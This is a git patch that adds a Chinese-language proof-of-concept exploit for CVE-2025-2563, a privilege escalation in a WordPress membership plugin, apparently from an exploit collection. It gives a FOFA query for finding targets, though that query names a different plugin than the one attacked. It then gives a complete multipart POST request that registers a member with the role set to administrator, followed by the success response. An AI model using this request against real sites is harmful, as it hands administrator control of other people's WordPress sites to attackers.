From c66951cd44aed469fcbe5ffd11b9e3da46d8a626 Mon Sep 17 00:00:00 2001 From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com> Date: Mon, 7 Apr 2025 10:52:06 +0800 Subject: [PATCH] =?UTF-8?q?Update=20WordPress=20(User=20Registration=20&?= =?UTF-8?q?=20Membership)=20Plugin=E6=9D=83=E9=99=90=E6=8F=90=E5=8D=87?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E(CVE-2025-2563).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ship) Plugin权限提升漏洞(CVE-2025-2563).md | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) diff --git a/wpoc/WordPress/WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563).md b/wpoc/WordPress/WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563).md index 8b13789..f18d386 100644 --- a/wpoc/WordPress/WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563).md +++ b/wpoc/WordPress/WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563).md @@ -1 +1,45 @@ +## WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563) +## fofa +``` +"/wp-content/plugins/wp-automatic" +``` +## 第一步 +通过 /registration 或 /membership-registration 前端页面注册 +## 第二步,注册后,使用该请求数据 +``` +POST /wp-admin/admin-ajax.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 +Accept: */* +Host: hackthebox.test +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335 + +----------------------------189123966817005614765335 +Content-Disposition: form-data; name="action" + +user_registration_membership_register_member +----------------------------189123966817005614765335 +Content-Disposition: form-data; name="security" + +THE_NONCE_HERE +----------------------------189123966817005614765335 +Content-Disposition: form-data; name="members_data" + +{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"} +----------------------------189123966817005614765335-- +``` +## 第三步,返回相应包如下 +``` +{ + "success": true, + "data": { + "member_id": 24, + "transaction_id": "", + "message": "New member has been successfully created." + } +} +``` +## github地址 +https://github.com/ubaydev/CVE-2025-2563